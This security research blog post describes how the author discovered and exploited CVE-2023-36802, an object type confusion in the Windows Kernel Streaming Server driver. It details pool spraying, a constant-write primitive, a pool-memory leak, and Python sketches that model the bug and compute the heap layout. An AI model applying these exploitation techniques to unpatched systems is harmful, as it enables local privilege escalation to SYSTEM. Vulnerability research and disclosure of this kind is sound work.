Last month Microsoft patched a vulnerability in the Microsoft Kernel Streaming Server, a Windows kernel component used in the virtualization and sharing of camera devices. The vulnerability, CVE-2023-36802, allows a local attacker to escalate privileges to SYSTEM.
This blog post details my process of exploring a new attack surface in the Windows kernel, finding a 0-day vulnerability, exploring an interesting bug class, and building a stable exploit. This post doesn’t require any specialized Windows kernel knowledge to follow along, though a basic understanding of memory corruption and operating system concepts is helpful. I’ll also cover the basics of performing initial analysis on an unfamiliar kernel driver, to simplify the process of looking at a new target.
The attack surface
The Microsoft Kernel Streaming Server (mskssrv.sys) is a component of Frame Server, a Windows Multimedia Framework service. The service virtualizes the camera device and allows it to be shared between multiple applications.
I began to explore this attack surface after noting CVE-2023-29360, which was initially listed as a TPM driver vulnerability but is actually in the Microsoft Kernel Streaming Server. Though at the time I was unfamiliar with MS KS Server, the name of the driver was enough to hold my interest. Despite knowing nothing about its purpose or functionality, I thought a streaming server in the kernel could be a fruitful place to look for vulnerabilities. Going in blind, I sought to answer the following questions:
- In what capacity can an unprivileged application interact with this kernel module?
- What type of data from the application does the module directly process?
To answer the first question, I started by analyzing the binary in a disassembler. I quickly identified the aforementioned vulnerability, a simple and elegant logic bug. The issue looked straightforward to trigger and fully exploit, so I set out to develop a quick proof-of-concept to better understand the inner workings of the mskssrv.sys driver.
Triggering execution inside MS KS Server
First, we need to be able to reach the driver from a user space application. The vulnerable function is reachable from the driver’s DispatchDeviceControl routine, meaning it can be reached by issuing an IOCTL to the driver. To do that, a handle to the driver’s device needs to be obtained via a call to CreateFile using the device’s path. Typically, the device name is straightforward to identify: find the call to IoCreateDevice in the driver and examine its third parameter, which contains the device name.
Function inside mskssrv.sys that calls IoCreateDevice with a NULL pointer for device name
In this case, the device name parameter is NULL. The calling function’s name suggests mskssrv is a PnP driver, and the call to IoAttachDeviceToDeviceStack indicates the created device object is part of a device stack. In effect, this means that multiple drivers are called when an I/O request is sent to the device. For PnP devices, the device interface path is needed in order to access the device.
Using the WinDbg kernel debugger, we can see which devices belong to the mskssrv driver, along with its device stack:
Output from !drvobj and !devobj commands showing upper and lower devices
Above we see mskssrv’s device is attached to the lower device object belonging to the swenum.sys driver and has an upper device attached belonging to ksthunk.sys.
From Device Manager we can find the target device instance ID:
Device Manager showing device instance ID and interface GUID
We now have enough information to get the device interface path using configuration manager or SetupApi functions. Using the retrieved device interface path, we can open a handle to the device.
Finally, we are able to trigger code execution inside mskssrv.sys. When a handle to the device is opened, the driver’s PnP dispatch create function is called. To reach additional code, we can send IOCTLs to the device, which are handled by the driver’s dispatch device control function.
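When reading a dispatch device control routine, it helps to decode the IOCTL codes it compares against. They follow the standard CTL_CODE bit layout (device type, required access, function number, transfer method), and the method matters: METHOD_BUFFERED codes pass input and output through Irp->AssociatedIrp.SystemBuffer. The Python sketch below is a generic helper, not mskssrv-specific; the example value is CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS), chosen for illustration rather than taken from the driver.

```python
# Field layout of a Windows IOCTL code, as built by the CTL_CODE macro:
#   bits 31-16: DeviceType   bits 15-14: RequiredAccess
#   bits 13-2:  Function     bits 1-0:   TransferType (method)
METHOD_NAMES = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of CTL_CODE(DeviceType, Function, Method, Access)."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> dict:
    """Split an IOCTL code seen in a disassembly back into its fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHOD_NAMES[code & 0x3],
    }


if __name__ == "__main__":
    # FILE_DEVICE_UNKNOWN (0x22), function 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS
    code = ctl_code(0x22, 0x800, 0, 0)
    print(hex(code))           # 0x222000
    print(decode_ioctl(code))  # {'device_type': 34, 'access': 0, 'function': 2048, 'method': 'METHOD_BUFFERED'}
```

Decoding every code in the dispatch switch this way quickly shows which handlers read from SystemBuffer.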
Debugging a ghost driver
When performing binary analysis, it is best practice to use a combination of static (disassembler, decompiler) and dynamic (debugger) tools. WinDbg can be used to kernel debug the target driver by setting breakpoints where code execution is expected to happen (dispatch create, dispatch device control).
Starting out, I had some difficulties: none of the breakpoints I set inside the driver were being hit. I had some doubts that I was opening the right device, or suspected I was doing something else wrong. I later realized that my breakpoints were being unset because the driver was being unloaded. I searched the internet for answers; however, there are not many results when searching for mskssrv, despite the driver being loaded and accessible by default on Windows. Among the few results I found was a thread on OSR where someone else had encountered a similar problem.
Words of encouragement from OSR poster
As it turns out, PnP filter drivers can be unloaded if they haven’t been used for a while, and loaded back on demand when needed.
I solved the issue by setting breakpoints after a handle to the device was opened but before calling DeviceIoControl, ensuring the driver had just been loaded.
A quick survey of driver functionality
The mskssrv driver is only a 72 KB binary and supports device I/O control codes that call into the following functions:
From these symbol names we can infer some of the driver’s functionality: something dealing with transmitting and receiving streams. At this point I dug more into the driver’s intended functionality. I found a presentation by Michael Maltsev about the Windows Multimedia Framework, from which I gleaned that the driver is part of an inter-process mechanism for sharing camera streams.
Since the driver is not very large and there are not many IOCTLs, I could look at each function to get an idea of the driver’s internals. Each IOCTL function operates on either a context registration object or a stream registration object, which is allocated and initialized via the corresponding “Initialize” IOCTL. The pointer to the object is stored in Irp->CurrentStackLocation->FileObject->FsContext2. FileObject points to the file object created for each open instance of the device, and FsContext2 is a field intended to store per-file-object metadata.
I spotted this bug while trying to understand how to communicate with the driver directly, initially forgoing analysis of the user-mode components, fsclient.dll and frameserver.dll. I almost missed the bug because I assumed the developers had implemented a simple check that, in fact, had been overlooked. Let’s take a look at the PublishRx IOCTL function:
FSRendezvousServer::PublishRx decompilation snippet
After the stream object is retrieved from FsContext2, the function FSRendezvousServer::FindObject is called to verify that the pointer matches an object found in one of two lists stored by the global FSRendezvousServer. At first, I assumed this function would have some way of verifying the requested object type. However, it returns TRUE if the pointer is found in either the list of context objects or the list of stream objects. Notice that no information about the expected object type is passed to FindObject. That means a context object can be passed as a stream object. This is an object type confusion vulnerability! It occurs in every IOCTL function that operates on stream objects. To patch the vulnerability, Microsoft replaced FSRendezvousServer::FindObject with FSRendezvousServer::FindStreamObject, which first verifies the object is a stream object by checking a type field.
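To make the bug class concrete, here is a small Python model of the lookup logic; it is an illustration, not the driver’s code. It assumes a simplified registration object carrying only a type field and a size. The 0x78 and 0x1D8 sizes come from the analysis, while the type values and the `publish_rx` helper are hypothetical. The pre-patch lookup accepts anything registered, so a context object stored in FsContext2 passes as a stream object; the patched lookup checks the type first.

```python
from dataclasses import dataclass, field

CONTEXT_TYPE, STREAM_TYPE = 1, 2   # hypothetical type-field values
STREAM_OBJ_SIZE = 0x1D8            # bytes a stream operation may touch


@dataclass(eq=False)
class RegObject:
    """Stand-in for a registration object stored in FileObject->FsContext2."""
    obj_type: int
    size: int


@dataclass
class RendezvousServer:
    contexts: list = field(default_factory=list)
    streams: list = field(default_factory=list)

    def find_object(self, obj) -> bool:
        # Pre-patch FindObject: a hit in EITHER list is accepted, no type check.
        return any(o is obj for o in self.contexts + self.streams)

    def find_stream_object(self, obj) -> bool:
        # Post-patch FindStreamObject: verify the type field first.
        return obj.obj_type == STREAM_TYPE and self.find_object(obj)


def publish_rx(server, fs_context2, patched=False):
    """Hypothetical helper: bytes past the end of the object that a stream
    operation would touch, or None if the lookup rejects the object."""
    lookup = server.find_stream_object if patched else server.find_object
    if not lookup(fs_context2):
        return None
    return max(0, STREAM_OBJ_SIZE - fs_context2.size)


if __name__ == "__main__":
    server = RendezvousServer()
    ctx = RegObject(CONTEXT_TYPE, 0x78)
    server.contexts.append(ctx)
    print(hex(publish_rx(server, ctx)))           # 0x160 (out of bounds)
    print(publish_rx(server, ctx, patched=True))  # None
```

The 0x160-byte overrun is simply 0x1D8 minus 0x78: every stream-object field beyond the context object’s end lands in whatever the pool placed next to it.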
Because context registration objects (0x78 bytes) are smaller than stream registration objects (0x1D8 bytes), stream object operations can be performed on out-of-bounds memory:
Object type confusion vulnerability illustration
In order to leverage the vulnerability primitive, we need the ability to control the out-of-bounds memory that is accessed. This can be done by triggering the allocation of many objects in the same area of memory as the vulnerable object, a technique called heap or pool spraying. The vulnerable object is allocated in the non-paged pool, served by the low-fragmentation heap (LFH). We can use the classic technique by Alex Ionescu of spraying named pipe (NpFr) buffers, which give total control of the memory contents following a 0x30-byte DATA_QUEUE_ENTRY header. By spraying with this technique, we can obtain the memory layout shown in the diagram:
NpFr Buffer Spraying Illustration
Using the chosen method of pool spraying, fields at object offsets within the ranges 0xC0-0x10F and 0x150-0x19F can be controlled. I once again revisited the IOCTL functions for stream objects to look for exploit primitives, searching for places where the controllable object fields are accessed and manipulated.
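The controllable ranges can be sanity-checked with a little arithmetic. The Python sketch below assumes each LFH chunk in the vulnerable object’s bucket is 0x90 bytes (the 0x78-byte object plus a 0x10-byte x64 POOL_HEADER, rounded up to 16 bytes), and that each sprayed NpFr chunk starts with a POOL_HEADER followed by the 0x30-byte DATA_QUEUE_ENTRY header. Offsets are relative to the start of the vulnerable object. Under those assumptions it reproduces the two ranges above and also locates the neighbors’ POOL_HEADERs.

```python
# Assumed x64 layout constants; offsets are relative to the start of the
# vulnerable 0x78-byte context object (just after its own POOL_HEADER).
POOL_HEADER_SIZE = 0x10     # x64 POOL_HEADER
DQE_HEADER_SIZE = 0x30      # DATA_QUEUE_ENTRY header in front of NpFr data
CONTEXT_OBJ_SIZE = 0x78     # context registration object (the real allocation)
STREAM_OBJ_SIZE = 0x1D8     # how far stream-object code believes it may reach
PROCESS_BILLED_OFF = 0x8    # ProcessBilled field inside an x64 POOL_HEADER


def lfh_chunk_size(obj_size: int) -> int:
    """Assumed chunk size: user size plus POOL_HEADER, rounded up to 16 bytes."""
    return (obj_size + POOL_HEADER_SIZE + 0xF) & ~0xF


def neighbor_layout(obj_size=CONTEXT_OBJ_SIZE, reach=STREAM_OBJ_SIZE):
    """Return (controlled_ranges, neighbor_header_offsets) within `reach`,
    assuming every following chunk is a sprayed NpFr buffer."""
    chunk = lfh_chunk_size(obj_size)
    start = chunk - POOL_HEADER_SIZE        # first neighbor's POOL_HEADER
    controlled, headers = [], []
    while start < reach:
        headers.append(start)
        data_lo = start + POOL_HEADER_SIZE + DQE_HEADER_SIZE
        data_hi = min(start + chunk - 1, reach - 1)
        if data_lo <= data_hi:              # some sprayed data is reachable
            controlled.append((data_lo, data_hi))
        start += chunk
    return controlled, headers


if __name__ == "__main__":
    ctrl, hdrs = neighbor_layout()
    print([(hex(lo), hex(hi)) for lo, hi in ctrl])  # [('0xc0', '0x10f'), ('0x150', '0x19f')]
    print([hex(h) for h in hdrs])                   # ['0x80', '0x110', '0x1a0']
    print(hex(hdrs[-1] + PROCESS_BILLED_OFF))       # 0x1a8
```

The stream object’s FSFrameMdl list head at offset 0x188 falls inside the second range, while the third neighbor’s POOL_HEADER sits at 0x1A0, with its ProcessBilled field at 0x1A8.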
I found a good constant write-where primitive in the PublishRx IOCTL. This primitive can be used to write a constant value at an arbitrary memory address. Let’s take a look at a snippet of the function FSStreamReg::PublishRx:
FSStreamReg::PublishRx decompilation snippet
The stream object contains a list head at offset 0x188 which describes a list of FSFrameMdl objects. In the decompilation snippet above, this list is iterated and if the tag value in the FSFrameMdl object matches the tag in the system buffer passed in from the application, the function FSFrameMdl::UnmapPages is called.
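The loop can be modeled as a standard Windows LIST_ENTRY walk: start at the head’s Flink and follow Flink pointers until the walk returns to the head. The Python sketch below uses a dictionary as simulated kernel memory. Only the 0x188 list-head offset comes from the decompilation; the link and tag offsets inside FSFrameMdl, the addresses, and the tag value are hypothetical placeholders. It illustrates why a single fake entry whose Flink points back at the head is enough to reach UnmapPages exactly once.

```python
# Simulated memory: {address: 64-bit value}. Only LIST_HEAD_OFF is taken from
# the decompilation; the FSFrameMdl field offsets below are hypothetical.
LIST_HEAD_OFF = 0x188   # FSFrameMdl list head inside the stream object
MDL_LINK_OFF = 0x0      # hypothetical: LIST_ENTRY at the start of FSFrameMdl
MDL_TAG_OFF = 0x10      # hypothetical: offset of the tag field


def walk_frame_mdls(mem: dict, stream_addr: int, wanted_tag: int, max_steps: int = 64) -> list:
    """Model of the PublishRx loop: return FSFrameMdl addresses whose tag
    matches, i.e. the objects UnmapPages would be called on."""
    head = stream_addr + LIST_HEAD_OFF
    hits = []
    entry = mem[head]                      # head->Flink
    for _ in range(max_steps):             # step guard exists only in this model
        if entry == head:                  # back at the head: walk is over
            return hits
        mdl = entry - MDL_LINK_OFF         # CONTAINING_RECORD(entry, FSFrameMdl, link)
        if mem.get(mdl + MDL_TAG_OFF) == wanted_tag:
            hits.append(mdl)
        entry = mem[entry]                 # entry->Flink
    raise RuntimeError("list never returned to its head")


if __name__ == "__main__":
    stream = 0xFFFF_C000_0010_0000         # hypothetical vulnerable object address
    fake = 0xFFFF_C000_0020_0000           # hypothetical fake FSFrameMdl address
    mem = {
        stream + LIST_HEAD_OFF: fake,                 # sprayed: head->Flink = fake
        fake + MDL_LINK_OFF: stream + LIST_HEAD_OFF,  # fake->Flink = head
        fake + MDL_TAG_OFF: 0x1337,                   # tag matching the IOCTL input
    }
    print(walk_frame_mdls(mem, stream, 0x1337) == [fake])  # True
```

In the real driver there is no step guard, so a fake list that never loops back to the head would hang or fault rather than raise.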
Using the aforementioned exploit primitive, the FSFrameMdlList, and thus the FSFrameMdl object pointed to by pFrameMdl, can be fully controlled. Let’s now look at UnmapPages:
On the last line of the decompiled function above, the constant value 2 is written at an offset from this (the FSFrameMdl object), which is controllable. This constant write can be used in conjunction with the I/O Ring technique to obtain arbitrary kernel read-write and escalate privileges. You can read more about how this technique works here and here.
Though I chose to utilize the constant write primitive, another useful exploit primitive also appears in this function. Both arguments to MmUnmapLockedPages, BaseAddress and MemoryDescriptorList, are controllable. This could be used to unmap a mapping at an arbitrary virtual address and construct a use-after-free-like primitive.
The charge problem
At this point, several suitable exploit primitives that give arbitrary kernel read-write have been identified. You might have noticed there are several checks on the contents of the stream object that must be passed to trigger the desired code path. For the most part, the proper state of the object can be achieved via pool spraying. However, I encountered a problem that caused some difficulty. Below is a code snippet of FSStreamReg::PublishRx after it finishes looping through the FSFrameMdlList:
FSStreamReg::PublishRx decompilation snippet
In the decompilation above, bPagesUnmapped is a boolean variable that gets set if FSFrameMdl::UnmapPages is called. If so, the value at offset 0x1a8 of the stream object is retrieved and, if it is not NULL, KeSetEvent is called on it.
This offset corresponds to out-of-bounds memory and points within a POOL_HEADER, the data structure that separates buffer allocations in the pool. In particular, it points to the ProcessBilled field, which stores a pointer to the _EPROCESS object of the process that is “charged” with the allocation. This is used to account for how many pool allocations a particular process can have. Not all pool allocations are charged against a process, and those that are not have the ProcessBilled field set to NULL in the POOL_HEADER. In addition, the EPROCESS pointer stored in ProcessBilled is XOR’d with a random cookie, so ProcessBilled doesn’t contain a valid pointer.
This presents a difficulty, because NpFr buffers are charged to the calling process, and thus their ProcessBilled field is set. When the needed exploit primitive is triggered, bPagesUnmapped will be set to TRUE, and if an invalid pointer is passed to KeSetEvent, the system will crash. Therefore, it’s necessary to ensure that the POOL_HEADER belongs to a non-charged allocation. At this point, I noticed that the context registration (Creg) object itself is not charged. However, this object does not allow control over memory contents at the FSFrameMdl offset. So, both NpFr and Creg objects need to be sprayed, and they also need to be sequenced correctly.
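The crash condition boils down to a small predicate. The Python sketch below models the post-loop check: KeSetEvent is reached only when pages were unmapped and the qword at offset 0x1a8 is non-NULL. ProcessBilled is modeled as a single XOR of the EPROCESS pointer with a cookie, following the description above; the real kernel encoding may mix in further values, and the address and cookie in the example are made up.

```python
import struct

EVENT_PTR_OFF = 0x1A8   # stream-object offset read after the FSFrameMdl loop


def encode_process_billed(eprocess: int, cookie: int) -> int:
    """Simplified ProcessBilled model: NULL for uncharged allocations, else
    EPROCESS XOR cookie. (Assumption: the real encoding may mix in more.)"""
    if eprocess == 0:
        return 0
    return (eprocess ^ cookie) & 0xFFFF_FFFF_FFFF_FFFF


def tail_is_safe(obj_bytes: bytes, pages_unmapped: bool) -> bool:
    """True if PublishRx would skip KeSetEvent after the loop.

    KeSetEvent runs only when pages were unmapped AND the qword at 0x1A8 is
    non-NULL; an encoded ProcessBilled value is not a valid KEVENT pointer,
    so that case is reported as unsafe (a crash)."""
    if not pages_unmapped:
        return True
    (value,) = struct.unpack_from("<Q", obj_bytes, EVENT_PTR_OFF)
    return value == 0


if __name__ == "__main__":
    cookie = 0x5A5A_5A5A_1234_5678                 # made-up cookie
    obj = bytearray(0x1D8)                          # neighbor uncharged (e.g. Creg)
    print(tail_is_safe(obj, pages_unmapped=True))   # True
    billed = encode_process_billed(0xFFFF_A000_1234_5080, cookie)  # charged (e.g. NpFr)
    struct.pack_into("<Q", obj, EVENT_PTR_OFF, billed)
    print(tail_is_safe(obj, pages_unmapped=True))   # False
```

Because the condition only depends on whether that qword is zero, the cookie’s value is irrelevant to the exploit: any charged neighbor is fatal, and any uncharged one is safe.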
Pool leak — No spray and pray!
Unlike big pool allocations, the addresses of LFH pool allocations can’t be leaked via NtQuerySystemInformation. Additionally, allocation order is randomized. Therefore, there is no way of knowing in advance whether the buffers adjacent to the vulnerable object are in the correct order to both trigger the exploit primitive and avoid crashing the system. Fortunately, the vulnerability can be used to trigger a pool leak of the adjacent buffers. Let’s take a look at the IOCTL function for ConsumeTx:
FSRendezvousServer::ConsumeTx decompilation snippet
Above, the function FSStreamReg::GetStats is called:
Here, the out-of-bounds memory contents of the vulnerable stream object are copied into the SystemBuffer, which is returned to the calling user space application. This pool information leak primitive can be used to perform a signature check on the buffers adjacent to the vulnerable object. Many vulnerable objects can be scanned until one within the desired memory layout is located. Once it is found, the memory layout is as follows:
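A minimal version of the signature check might look like the Python sketch below. It assumes the leaked bytes are indexed by stream-object offset and that the neighbor POOL_HEADERs sit at offsets 0x80, 0x110 and 0x1A0, which follows from assuming 0x90-byte LFH chunks. A candidate is accepted when the first two neighbors carry the NpFr pool tag and the third neighbor’s ProcessBilled (offset 0x1A8) is NULL, i.e. an uncharged allocation such as a Creg object. The helper names are hypothetical, and `fake_leak` only fabricates test input.

```python
import struct

# Offsets relative to the vulnerable object (assumed 0x90-byte LFH chunks).
NPFR_HEADER_OFFS = (0x80, 0x110)   # neighbors whose data we need to control
GUARD_HEADER_OFF = 0x1A0           # neighbor whose ProcessBilled is read at 0x1A8
POOL_TAG_OFF = 0x4                 # PoolTag inside an x64 POOL_HEADER
PROCESS_BILLED_OFF = 0x8           # ProcessBilled inside an x64 POOL_HEADER


def layout_ok(leak: bytes) -> bool:
    """Signature check on one leaked buffer (hypothetical helper)."""
    for hdr in NPFR_HEADER_OFFS:
        tag = leak[hdr + POOL_TAG_OFF : hdr + POOL_TAG_OFF + 4]
        if tag != b"NpFr":
            return False
    (billed,) = struct.unpack_from("<Q", leak, GUARD_HEADER_OFF + PROCESS_BILLED_OFF)
    return billed == 0                 # uncharged neighbor: KeSetEvent is skipped


def find_target(leaks):
    """Index of the first vulnerable object with the right neighbors, or None."""
    for i, leak in enumerate(leaks):
        if layout_ok(leak):
            return i
    return None


def fake_leak(tags, billed):
    """Build a synthetic 0x1D8-byte leak for exercising the scan."""
    buf = bytearray(0x1D8)
    for hdr, tag in zip(NPFR_HEADER_OFFS + (GUARD_HEADER_OFF,), tags):
        buf[hdr + POOL_TAG_OFF : hdr + POOL_TAG_OFF + 4] = tag
    struct.pack_into("<Q", buf, GUARD_HEADER_OFF + PROCESS_BILLED_OFF, billed)
    return bytes(buf)


if __name__ == "__main__":
    leaks = [
        fake_leak((b"NpFr", b"Creg", b"NpFr"), 0xDEADBEEF),  # wrong order
        fake_leak((b"NpFr", b"NpFr", b"NpFr"), 0xDEADBEEF),  # charged guard
        fake_leak((b"NpFr", b"NpFr", b"Creg"), 0),           # desired layout
    ]
    print(find_target(leaks))  # 2
```

Checking pool tags plus a single NULL qword keeps the scan cheap, so many candidate objects can be tested before committing to the one write that matters.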
CVE-2023-36802 Low-Fragmentation Heap Pool Groom Layout
Now, having located the target vulnerable object in the correct position in memory, the aforementioned exploit primitive on the target object can be triggered without crashing the system.
In-the-wild exploitation
After I reported the issue to MSRC, in-the-wild exploitation of the vulnerability was discovered.
The exploitation methods presented in this blog post are some of many approaches that could be taken. Presently, there is no public information about how attackers in the wild exploited this vulnerability. You can find exploit code here.
Retroactive patch analysis revealed that a large portion of new code was added to mskssrv.sys in the 1809 build of Windows 10. Monitoring for new code additions is often fruitful for finding vulnerabilities.
Another tired but classic lesson to be learned from this analysis: don’t make assumptions about the checks performed. A friend and colleague suggested that type confusion using FsContext2 could be a “common but under researched bug class”. I believe more variant analysis is warranted for this bug class, particularly in drivers that deal with inter-process communication.
The discovery of this vulnerability came about while simply trying to interface with an unfamiliar attack surface. Having “knowledge critically close to zero” of a system can also mean having the fresh mindset to break it.